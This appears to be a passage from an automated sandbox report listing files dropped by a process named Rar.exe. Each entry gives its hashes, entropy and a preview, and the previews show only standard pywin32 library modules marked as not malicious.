                                                                                                                                                                                                                                  Preview:# Generated by h2py from lmaccess.h..# Included from lmcons.h.CNLEN = 15.LM20_CNLEN = 15.DNLEN = CNLEN.LM20_DNLEN = LM20_CNLEN.UNCLEN = CNLEN + 2.LM20_UNCLEN = LM20_CNLEN + 2.NNLEN = 80.LM20_NNLEN = 12.RMLEN = UNCLEN + 1 + NNLEN.LM20_RMLEN = LM20_UNCLEN + 1 + LM20_NNLEN.SNLEN = 80.LM20_SNLEN = 15.STXTLEN = 256.LM20_STXTLEN = 63.PATHLEN = 256.LM20_PATHLEN = 256.DEVLEN = 80.LM20_DEVLEN = 8.EVLEN = 16.UNLEN = 256.LM20_UNLEN = 20.GNLEN = UNLEN.LM20_GNLEN = LM20_UNLEN.PWLEN = 256.LM20_PWLEN = 14.SHPWLEN = 8.CLTYPE_LEN = 12.MAXCOMMENTSZ = 256.LM20_MAXCOMMENTSZ = 48.QNLEN = NNLEN.LM20_QNLEN = LM20_NNLEN.ALERTSZ = 128.NETBIOS_NAME_LEN = 16.CRYPT_KEY_LEN = 7.CRYPT_TXT_LEN = 8.ENCRYPTED_PWLEN = 16.SESSION_PWLEN = 24.SESSION_CRYPT_KLEN = 21.PARMNUM_ALL = 0.PARM_ERROR_NONE = 0.PARMNUM_BASE_INFOLEVEL = 1000.NULL = 0.PLATFORM_ID_DOS = 300.PLATFORM_ID_OS2 = 400.PLATFORM_ID_NT = 500.PLATFORM_ID_OSF = 600.PLATFORM_ID_VMS = 700.MAX_LANMAN_MESSAGE_ID = 5799.UF_SCRIPT = 1.UF_ACCOUNTDISABLE = 2.UF_HOMEDIR_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23345
                                                                                                                                                                                                                                  Entropy (8bit):4.411538185872905
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+FzU1rmtmzoAVnZj1lkYZwErcrxEJ4zU4CrML/nZj7mnRJMhA/NL5YTYA5x+W:iz0mozoAFZ+rxC444Cr8/Zg7BNL5YJ1
                                                                                                                                                                                                                                  MD5:BF0D2114EDDEEBD1CE68A9EAE89B816F
                                                                                                                                                                                                                                  SHA1:E1A693DCA326553D9C721EF87B989EC2F7F03855
                                                                                                                                                                                                                                  SHA-256:B0003F4A62C0423ED5FCE784CC2DAFD46D4326FF3779C38CC6B41514785DAAA2
                                                                                                                                                                                                                                  SHA-512:A1898D94EA296110A1CF036863F3E0DF30C8570466ACDC32058FE20A6DD0091ECE254B6FE9CB290364564A5AF263DA7BF79061285AABA8D5A32728D0C8DC4BE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Performance Data Helper (PDH) Query Classes..Wrapper classes for end-users and high-level access to the PDH query.mechanisms. PDH is a win32-specific mechanism for accessing the.performance data made available by the system. The Python for Windows.PDH module does not implement the "Registry" interface, implementing.the more straightforward Query-based mechanism...The basic idea of a PDH Query is an object which can query the system.about the status of any number of "counters." The counters are paths.to a particular piece of performance data. For instance, the path .'\\Memory\\Available Bytes' describes just about exactly what it says.it does, the amount of free memory on the default computer expressed .in Bytes. These paths can be considerably more complex than this, .but part of the point of this wrapper module is to hide that.complexity from the end-user/programmer...EXAMPLE: A more complex Path..'\\\\RAISTLIN\\PhysicalDisk(_Total)\\Avg. Disk Bytes/Read'..Raistlin --> Comput
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7572
                                                                                                                                                                                                                                  Entropy (8bit):4.760002873265964
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:rzrV6tcGJwM6z1h5q6wq+zoDz7iHEQER6qkYdWXxQeio:rzOwv9qICqbox
                                                                                                                                                                                                                                  MD5:8AD62CBBD2071246ABA788230750686B
                                                                                                                                                                                                                                  SHA1:23BBB6B4B02A5119B2B076D0C79852F54F264A79
                                                                                                                                                                                                                                  SHA-256:306381F35E30A3864D0C8B7CE4A643DB6459B46A4B2ACDBDDF3F51F97236F280
                                                                                                                                                                                                                                  SHA-512:F3083469BCD5C3A05FB25F4D313DD9C9652FC7929AFC27E4C0CB7AD55FB1A8EB314C60300153FA3FBD1FBE3A37B4826B0FF68224F8CA5DD26BC1FBA7D966E2E5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Utilities for the win32 Performance Data Helper module..Example:. To get a single bit of data:. >>> import win32pdhutil. >>> win32pdhutil.GetPerformanceAttributes("Memory", "Available Bytes"). 6053888. >>> win32pdhutil.FindPerformanceAttributesByName("python", counter="Virtual Bytes"). [22278144].. First example returns data which is not associated with any specific instance... The second example reads data for a specific instance - hence the list return -. it would return one result for each instance of Python running... In general, it can be tricky finding exactly the "name" of the data you wish to query.. Although you can use <om win32pdh.EnumObjectItems>(None,None,(eg)"Memory", -1) to do this,. the easiest way is often to simply use PerfMon to find out the names.."""..import time..import win32pdh..error = win32pdh.error..# Handle some louserzation issues..# see http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q287/1/5
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21621
                                                                                                                                                                                                                                  Entropy (8bit):4.345741275259594
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:14EBSW45wnsBm90TycgCgHv+gDaFWz08oQdcqlsOaCZUCrBX0+ODX5UZTQdNH6kF:14EBkbg0T1gCgHk6cqqOaeUCJZ0bH6kF
                                                                                                                                                                                                                                  MD5:6E9D68C5DA50B72139D96FF891CD4721
                                                                                                                                                                                                                                  SHA1:D062B14C6573976B48B9EE109FE1E9E25D0B49F1
                                                                                                                                                                                                                                  SHA-256:0800FE2913F79F7FD01B4E6ECC35890AE1E790C3B3BB822DAF5E683D783A3D25
                                                                                                                                                                                                                                  SHA-512:34E8525684978447423BA9E40253F1603D846E657DD4F27707BA48C7A56AAEEC0ABB9E49E9948C94EBEE7437C371E10FF8354F00C2C2E2A4B9B2BB34200EDD51
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Windows dialog .RC file parser, by Adam Walker...# This module was adapted from the spambayes project, and is Copyright.# 2003/2004 The Python Software Foundation and is covered by the Python.# Software Foundation license..""".This is a parser for Windows .rc files, which are text files which define.dialogs and other Windows UI resources..""".__author__ = "Adam Walker".__version__ = "0.11"..import os.import pprint.import shlex.import stat.import sys..import commctrl.import win32con.._controlMap = {. "DEFPUSHBUTTON": 0x80,. "PUSHBUTTON": 0x80,. "Button": 0x80,. "GROUPBOX": 0x80,. "Static": 0x82,. "CTEXT": 0x82,. "RTEXT": 0x82,. "LTEXT": 0x82,. "LISTBOX": 0x83,. "SCROLLBAR": 0x84,. "COMBOBOX": 0x85,. "EDITTEXT": 0x81,. "ICON": 0x82,. "RICHEDIT": "RichEdit20A",.}..# These are "default styles" for certain controls - ie, Visual Studio assumes.# the styles will be applied, and emits a "NOT {STYLE_NAME}" if it is to be.# disabled. These defaults ha
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37862
                                                                                                                                                                                                                                  Entropy (8bit):4.614779913776034
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:AO8FXlkGUR9NrtkfDzwVfA4wLI9w+M8M/ZwX6x+czhipBbfwT9aFFep:AO6bI9NrQI9VMn/ZwX6x+czMpBbfi
                                                                                                                                                                                                                                  MD5:A2763C3261E20DD075A58806FC70F5D6
                                                                                                                                                                                                                                  SHA1:EAA742D5CF6A52C4FF73FE918576BC833B5773F4
                                                                                                                                                                                                                                  SHA-256:5AEC1FB03072ADA28FB7E6A481BAB681EF86D6A8B5655D42EC2025480D192629
                                                                                                                                                                                                                                  SHA-512:4C721D6130027E5EBE64A8DADA7694B3351C43468DD14401290073D3B28FBA0E4538FD8BE94C9A92593AD32E47E995BB642AEE4D28019EDC1D4C81ADEEAF04AA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# General purpose service utilities, both for standard Python scripts,.# and for for Python programs which run as services....#.# Note that most utility functions here will raise win32api.error's.# (which is win32service.error, pywintypes.error, etc).# when things go wrong - eg, not enough permissions to hit the.# registry etc...import importlib.import os.import sys.import warnings..import pywintypes.import win32api.import win32con.import win32service.import winerror.._d = "_d" if "_d.pyd" in importlib.machinery.EXTENSION_SUFFIXES else "".error = RuntimeError...# Returns the full path to an executable for hosting a Python service - typically.# 'pythonservice.exe'.# * If you pass a param and it exists as a file, you'll get the abs path back.# * Otherwise we'll use the param instead of 'pythonservice.exe', and we will.# look for it..def LocatePythonServiceExe(exe=None):. if not exe and hasattr(sys, "frozen"):. # If py2exe etc calls this with no exe, default is current exe,.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34707
                                                                                                                                                                                                                                  Entropy (8bit):4.807361610549798
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:tPJIPrdvdG2k1yjOW8/S8qwAKUQM/pSfWk9D:tPJIBk15W8/SzaWk9D
                                                                                                                                                                                                                                  MD5:718FFB8E2DE16CC50F85AE5A97357C1E
                                                                                                                                                                                                                                  SHA1:0C525852741BB3C79217BB8BE74B70BF961BA6CE
                                                                                                                                                                                                                                  SHA-256:0B841E5261A6631A779AADC686380CD950687BCFCA5DEBB3811F1239B0D46215
                                                                                                                                                                                                                                  SHA-512:0649B8EAF331CD2A8E126614CF2C3F4C19659E0E18710AB945CD118D257F11FAF10745CACC477CA684576D27FB32D6ABE850645483E970BDA9A87ABFF3BA968B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: UTF-8 -*-..""".win32timezone:. Module for handling datetime.tzinfo time zones using the windows.registry for time zone information. The time zone names are dependent.on the registry entries defined by the operating system... This module may be tested using the doctest module... Written by Jason R. Coombs (jaraco@jaraco.com).. Copyright . 2003-2012.. All Rights Reserved... This module is licenced for use in Mark Hammond's pywin32.library under the same terms as the pywin32 library... To use this time zone module with the datetime module, simply pass.the TimeZoneInfo object to the datetime constructor. For example,..>>> import win32timezone, datetime.>>> assert 'Mountain Standard Time' in win32timezone.TimeZoneInfo.get_sorted_time_zone_names().>>> MST = win32timezone.TimeZoneInfo('Mountain Standard Time').>>> now = datetime.datetime.now(MST).. The now object is now a time-zone aware object, and daylight savings-.aware methods may be called on it..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1584
                                                                                                                                                                                                                                  Entropy (8bit):4.654992084520462
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:aNWT3mYj2PxhrzR5jhWEhEJA755kzfs8R6tTw6mrHcBkAV6vbdw:oWbUh3R55Eqk1CTw6pXVAy
                                                                                                                                                                                                                                  MD5:BDFB78DE5F5D6078A8BD64C4F657E8C7
                                                                                                                                                                                                                                  SHA1:866AA96F01D696B9C372CD553DD450D757675E6B
                                                                                                                                                                                                                                  SHA-256:0F10F3808D3A2A2913D6AD0F2FE7533CE0FA97C9DD9B076ECDA74746D3B14A61
                                                                                                                                                                                                                                  SHA-512:B4E95B9891C3A466A1F06587C850AE26F4E15F4FBA238AB384217F239AAFD4F6E628B120343271C794B8E15EAE0E90864ADE9540DB0E82CA3176BA2B12F78F4E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a helper for the win32trace module..# If imported from a normal Python program, it sets up sys.stdout and sys.stderr.# so output goes to the collector...# If run from the command line, it creates a collector loop...# Eg:.# C:>start win32traceutil.py (or python.exe win32traceutil.py).# will start a process with a (pretty much) blank screen..#.# then, switch to a DOS prompt, and type:.# C:>python.exe.# Python 1.4 etc....# >>> import win32traceutil.# Redirecting output to win32trace remote collector.# >>> print "Hello".# >>>.# And the output will appear in the first collector process...# Note - the client or the collector can be started first..# There is a 0x20000 byte buffer. If this gets full, it is reset, and new.# output appended from the start...import win32trace...def RunAsCollector():. import sys.. try:. import win32api.. win32api.SetConsoleTitle("Python Trace Collector"). except:. pass # Oh well!. win32trace.InitRead(). print("Collec
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7181
                                                                                                                                                                                                                                  Entropy (8bit):4.8562430886724055
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:2iXBeK46B+reiXzazgvCzzLGz/cqXsvAzSKSi+0NYBQL2wTekW6FRJVt6fgvokMH:2iXB3Lzw9WMRJ9Q3
                                                                                                                                                                                                                                  MD5:7388BE0EC0F22D309FD05084BEA46732
                                                                                                                                                                                                                                  SHA1:C1344C0077A437F903090F9ACEFD4D023490F2E6
                                                                                                                                                                                                                                  SHA-256:59028FB43A41D5F1A37425AA91ECE10D9A3336494E9FC12A85456213EC157524
                                                                                                                                                                                                                                  SHA-512:542855F86F989D8DC7EA2F9F5B56BB2D2DC9E137B14AFC79387AA7B16CDA7C213FBBDE125E1C2F81FFCDBCCCCD19DD009DB3D6F0D9F8C531CD5EF32E5249CDD9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Stamp a Win32 binary with version information.."""..import glob.import optparse.import os.import struct.import sys..from win32api import BeginUpdateResource, EndUpdateResource, UpdateResource..VS_FFI_SIGNATURE = -17890115 # 0xFEEF04BD.VS_FFI_STRUCVERSION = 0x00010000.VS_FFI_FILEFLAGSMASK = 0x0000003F.VOS_NT_WINDOWS32 = 0x00040004..null_byte = "\0".encode("ascii") # str in py2k, bytes in py3k...#.# Set VS_FF_PRERELEASE and DEBUG if Debug.#.def file_flags(debug):. if debug:. return 3 # VS_FF_DEBUG | VS_FF_PRERELEASE. return 0...def file_type(is_dll):. if is_dll:. return 2 # VFT_DLL. return 1 # VFT_APP...def VS_FIXEDFILEINFO(maj, min, sub, build, debug=0, is_dll=1):. return struct.pack(. "lllllllllllll",. VS_FFI_SIGNATURE, # dwSignature. VS_FFI_STRUCVERSION, # dwStrucVersion. (maj << 16) | min, # dwFileVersionMS. (sub << 16) | build, # dwFileVersionLS. (maj << 16) | min, # dwProductVersionMS. (sub
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):101476
                                                                                                                                                                                                                                  Entropy (8bit):4.77819887256081
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:4t1wPaKFhrJ8Z4URAd4X918GSpoJVIgF4QNAOeETca2AU/bZVQOtdIiFns00yP8X:o0P7Y9uNpcVIgF4KRq9FwO8ELE0g1OC
                                                                                                                                                                                                                                  MD5:3E6BCC747E8DBB2605E4F71B359F574A
                                                                                                                                                                                                                                  SHA1:00FCA4E9E1878BC43471E61D37829FA8B1B7E419
                                                                                                                                                                                                                                  SHA-256:BDEFDD1C793B377C8712924EC2E9DC1DD36CF4D0231C42A0754F4800C4C33CE4
                                                                                                                                                                                                                                  SHA-512:D4AB8EE26C86C517118C58542B559233B43C68E3860580B65662BC403FD2048827B67038DA536F49EDC5A09880988914A6EA6B7EB50509F74278FA072173842B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Error related constants for win32..Generated by h2py from winerror.h.""".# Few extras added manually....TRUST_E_PROVIDER_UNKNOWN = -2146762751.TRUST_E_ACTION_UNKNOWN = -2146762750.TRUST_E_SUBJECT_FORM_UNKNOWN = -2146762749.TRUST_E_SUBJECT_NOT_TRUSTED = -2146762748.# up to here.....FACILITY_WINRM = 51.FACILITY_WINDOWSUPDATE = 36.FACILITY_WINDOWS_DEFENDER = 80.FACILITY_WINDOWS_CE = 24.FACILITY_WINDOWS = 8.FACILITY_URT = 19.FACILITY_UMI = 22.FACILITY_TPM_SOFTWARE = 41.FACILITY_TPM_SERVICES = 40.FACILITY_SXS = 23.FACILITY_STORAGE = 3.FACILITY_STATE_MANAGEMENT = 34.FACILITY_SSPI = 9.FACILITY_SCARD = 16.FACILITY_SHELL = 39.FACILITY_SETUPAPI = 15.FACILITY_SECURITY = 9.FACILITY_RPC = 1.FACILITY_PLA = 48.FACILITY_WIN32 = 7.FACILITY_CONTROL = 10.FACILITY_NULL = 0.FACILITY_NDIS = 52.FACILITY_METADIRECTORY = 35.FACILITY_MSMQ = 14.FACILITY_MEDIASERVER = 13.FACILITY_INTERNET = 12.FACILITY_ITF = 4.FACILITY_USERMODE_HYPERVISOR = 53.FACILITY_HTTP = 25.FACILITY_GRAPHICS = 38.FACILITY_FWP = 50.FACILIT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35375
                                                                                                                                                                                                                                  Entropy (8bit):4.947059805776436
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:q3w3vnh68AVm2oVvU7O/0iFvQW3mSnvmlqqoKzl306El/Bs:qIvn5GOYiFj0qyu6Ec
                                                                                                                                                                                                                                  MD5:3DF6D6E817826DB59BC39A28767FBF17
                                                                                                                                                                                                                                  SHA1:C4A306CFBDE9C4A7AA9D6EC31A7F5DF460AF3712
                                                                                                                                                                                                                                  SHA-256:96315AD778ABB36647DFA50E972327BF3CE302E406BA82A0BBCB1468F0B0B724
                                                                                                                                                                                                                                  SHA-512:62AF06B18236700DE5F72170E98C689D66DEBA7DC782C2E3BFBBF39DF3CC2249F14DD5A69D3A1BC68CB27C17A5DE2234BA09EB5F5FA19A77E7DECC736490D3D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## flags, enums, guids used with DeviceIoControl from WinIoCtl.h..import pywintypes.from ntsecuritycon import FILE_READ_DATA, FILE_WRITE_DATA...def CTL_CODE(DeviceType, Function, Method, Access):. return (DeviceType << 16) | (Access << 14) | (Function << 2) | Method...def DEVICE_TYPE_FROM_CTL_CODE(ctrlCode):. return (ctrlCode & 0xFFFF0000) >> 16...FILE_DEVICE_BEEP = 0x00000001.FILE_DEVICE_CD_ROM = 0x00000002.FILE_DEVICE_CD_ROM_FILE_SYSTEM = 0x00000003.FILE_DEVICE_CONTROLLER = 0x00000004.FILE_DEVICE_DATALINK = 0x00000005.FILE_DEVICE_DFS = 0x00000006.FILE_DEVICE_DISK = 0x00000007.FILE_DEVICE_DISK_FILE_SYSTEM = 0x00000008.FILE_DEVICE_FILE_SYSTEM = 0x00000009.FILE_DEVICE_INPORT_PORT = 0x0000000A.FILE_DEVICE_KEYBOARD = 0x0000000B.FILE_DEVICE_MAILSLOT = 0x0000000C.FILE_DEVICE_MIDI_IN = 0x0000000D.FILE_DEVICE_MIDI_OUT = 0x0000000E.FILE_DEVICE_MOUSE = 0x0000000F.FILE_DEVICE_MULTI_UNC_PROVIDER = 0x00000010.FILE_DEVICE_NAMED_PIPE = 0x00000011.FILE_DEVICE_NETWORK = 0x00000012.FILE_DEVICE_NE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37443
                                                                                                                                                                                                                                  Entropy (8bit):5.062040837597238
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:M1R3blbtAU2MXle367ilbqqHGDyACQINpB1NzGU9z+c1m/XcSe:yoMXl/iRqoGI9z+cMcSe
                                                                                                                                                                                                                                  MD5:B1462067D46C806885EDDCE722EC69E4
                                                                                                                                                                                                                                  SHA1:7F604203D100378E7AE54333B44CA4163A527D5E
                                                                                                                                                                                                                                  SHA-256:F2A893A055E72F1A21474A2D0AF2847874D241DCC6EE2F11F0213CA89F2B3328
                                                                                                                                                                                                                                  SHA-512:5FA6A9004AA50EDB8081AB33048D03E905DAB785946830F22E0F3472D45728C54B5879F859E4040766CADB784BE5EC89CEF80D4E0F9B59FE21C3CA38494EF81C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from \mssdk\include\winnt.h..APPLICATION_ERROR_MASK = 536870912.ERROR_SEVERITY_SUCCESS = 0.ERROR_SEVERITY_INFORMATIONAL = 1073741824.ERROR_SEVERITY_WARNING = -2147483648.ERROR_SEVERITY_ERROR = -1073741824.MINCHAR = 128.MAXCHAR = 127.MINSHORT = 32768.MAXSHORT = 32767.MINLONG = -2147483648.MAXLONG = 2147483647.MAXBYTE = 255.MAXWORD = 65535.MAXDWORD = -1.LANG_NEUTRAL = 0.LANG_AFRIKAANS = 54.LANG_ALBANIAN = 28.LANG_ARABIC = 1.LANG_BASQUE = 45.LANG_BELARUSIAN = 35.LANG_BULGARIAN = 2.LANG_CATALAN = 3.LANG_CHINESE = 4.LANG_CROATIAN = 26.LANG_CZECH = 5.LANG_DANISH = 6.LANG_DUTCH = 19.LANG_ENGLISH = 9.LANG_ESTONIAN = 37.LANG_FAEROESE = 56.LANG_FARSI = 41.LANG_FINNISH = 11.LANG_FRENCH = 12.LANG_GERMAN = 7.LANG_GREEK = 8.LANG_HEBREW = 13.LANG_HINDI = 57.LANG_HUNGARIAN = 14.LANG_ICELANDIC = 15.LANG_INDONESIAN = 33.LANG_ITALIAN = 16.LANG_JAPANESE = 17.LANG_KOREAN = 18.LANG_LATVIAN = 38.LANG_LITHUANIAN = 39.LANG_MACEDONIAN = 47.LANG_MALAY = 62.LANG_NORWEGIAN = 20.LANG_POLISH = 21
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5911
                                                                                                                                                                                                                                  Entropy (8bit):4.465756105097943
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:7PZRsJXrfE8ya78yd8ysr8yH78ywZSRhORN6y/o8yJ078Tm6Pt1R7ny+7nTS1pQJ:lRsJrfEG7BYrD7tM0q7W7x7ka1+YSwSm
                                                                                                                                                                                                                                  MD5:00BBE05FD99166836678F90A9911A478
                                                                                                                                                                                                                                  SHA1:EF0A2B4DC2AC55643E7F2326942612586D653F46
                                                                                                                                                                                                                                  SHA-256:A787E682F6200CF1F0DCCBD48E90F758B969C95DBFEB5430651AC41E1658FE06
                                                                                                                                                                                                                                  SHA-512:6ED6367F7C02805991E56F2BEB88928A9A34EB02ABBFA4E6C4AB189F516CC053C9C740B9C1D8C0B828E4574924141888A66AB46DFF7399869F19525325E837ED
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Generated by h2py from winperf.h.PERF_DATA_VERSION = 1.PERF_DATA_REVISION = 1.PERF_NO_INSTANCES = -1.PERF_SIZE_DWORD = 0x00000000.PERF_SIZE_LARGE = 0x00000100.PERF_SIZE_ZERO = 0x00000200.PERF_SIZE_VARIABLE_LEN = 0x00000300.PERF_TYPE_NUMBER = 0x00000000.PERF_TYPE_COUNTER = 0x00000400.PERF_TYPE_TEXT = 0x00000800.PERF_TYPE_ZERO = 0x00000C00.PERF_NUMBER_HEX = 0x00000000.PERF_NUMBER_DECIMAL = 0x00010000.PERF_NUMBER_DEC_1000 = 0x00020000.PERF_COUNTER_VALUE = 0x00000000.PERF_COUNTER_RATE = 0x00010000.PERF_COUNTER_FRACTION = 0x00020000.PERF_COUNTER_BASE = 0x00030000.PERF_COUNTER_ELAPSED = 0x00040000.PERF_COUNTER_QUEUELEN = 0x00050000.PERF_COUNTER_HISTOGRAM = 0x00060000.PERF_TEXT_UNICODE = 0x00000000.PERF_TEXT_ASCII = 0x00010000.PERF_TIMER_TICK = 0x00000000.PERF_TIMER_100NS = 0x00100000.PERF_OBJECT_TIMER = 0x00200000.PERF_DELTA_COUNTER = 0x00400000.PERF_DELTA_BASE = 0x00800000.PERF_INVERSE_COUNTER = 0x01000000.PERF_MULTI_COUNTER = 0x02000000.PERF_DISPLAY_NO_SUFFIX = 0x00000000.PERF_DISPLAY_PE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                  Entropy (8bit):4.614942657274806
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:svKVMrg55fqwkAsQPlRGGR0khyRCuXp3FxXFZF/+/z5GEH0LJln:iKV3v7zN1R0khykuZnhW/MEHyJl
                                                                                                                                                                                                                                  MD5:AFA2616539DD48A88AA2E7071342A977
                                                                                                                                                                                                                                  SHA1:B54B743581965E75D2AC912AD4AC450E0C3164D4
                                                                                                                                                                                                                                  SHA-256:11B834A54993AE29F7334391BDF7B05F3731A99180D4B376D0ED0ABB3E07B8DF
                                                                                                                                                                                                                                  SHA-512:93E9916B9729ECED9ED6409945BD7E39BA644EFB08C3D21674ECB55D316EABE3AA025E1384BA3D05722F123A99A4A155E612377E3F66376FCABAE66AEF56E4DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A useful wrapper around the "_winxptheme" module...Originally used when we couldn't be sure Windows XP apis were going to.be available. In 2022, it's safe to assume they are, so this is just a wrapper.around _winxptheme..""".from _winxptheme import *.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:current ar archive
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):105046
                                                                                                                                                                                                                                  Entropy (8bit):5.468277487512252
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:Yo1NEllyTdHG0maB6OHP78QiCTWsAO+GmBM:5TdHF6S8Ab+G
                                                                                                                                                                                                                                  MD5:19F6BCA56A9CF416E09E06C744F0C0E7
                                                                                                                                                                                                                                  SHA1:352E73AF0A6662D367BDCC203132E5CA32BECD30
                                                                                                                                                                                                                                  SHA-256:BE8CEACBE3565722C61FB025EF609A5CDC732EEC4448653F5B4107DF1F1487DF
                                                                                                                                                                                                                                  SHA-512:23D00A61EDF83C115BEF7B014B02309BD0174A802BEAA6CBAB80D8F876198D64AED693D6E6752145D3E231869FE4E77D01EDB6CC4B4B5DB3B91003B69985DDAB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:!<arch>./ -1 0 29986 `....O...T.....................*$.......b..t...t....X...X.........0...0..,:..,:..,...,...1...1....................J...J...........h...h...z...z...........P...P........................... ... ...X...X..................-x..-x..(v..(v..$...$...?...?...:...:...........m...m....B...B...........................$...$...r...r........................................................................$...$.......................#...#....f...f...........<...<...................8...8...........H...H...................@...@...................Z...Z...........................................6...6...f...&..~...+...X~..X~..B&..B&...@...@..................u^..u^..........."..."...&...&.........@...@..zr..zr..........{...{...........y...y....,...........6...6..R...R...ZH..ZH..D...D...u...u...........t@..t@..........s...s....|...|...................X...X...........................................p...p...........D...D..........{...{.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17920
                                                                                                                                                                                                                                  Entropy (8bit):5.822660648618855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Q+UL/q4Cs1L32Dk3J3zfXf/PULQjduSzulBAaAdCqeiJOU+:Cqk73J3zfXfLugcGEzLU+
                                                                                                                                                                                                                                  MD5:2A754EF14BB6BDEE5D63F4827581F586
                                                                                                                                                                                                                                  SHA1:A106AC33A6FAD450C7179FD0A2EA34E7E87E9242
                                                                                                                                                                                                                                  SHA-256:AAD5E5A3180A66E9B594E9B6854241F91C58D2218D7ED4FFEAAEA3FD171D98D4
                                                                                                                                                                                                                                  SHA-512:B97899051064FF95540F3C7728BE8939CE08B8845726E9A4600387A5DC2A9C5D62FCE345C98744696DA80148F4DFB2BBEFD06B142275E615202F892FC7BC6DF5
                                                                                                                                                                                                                                  Malicious:false
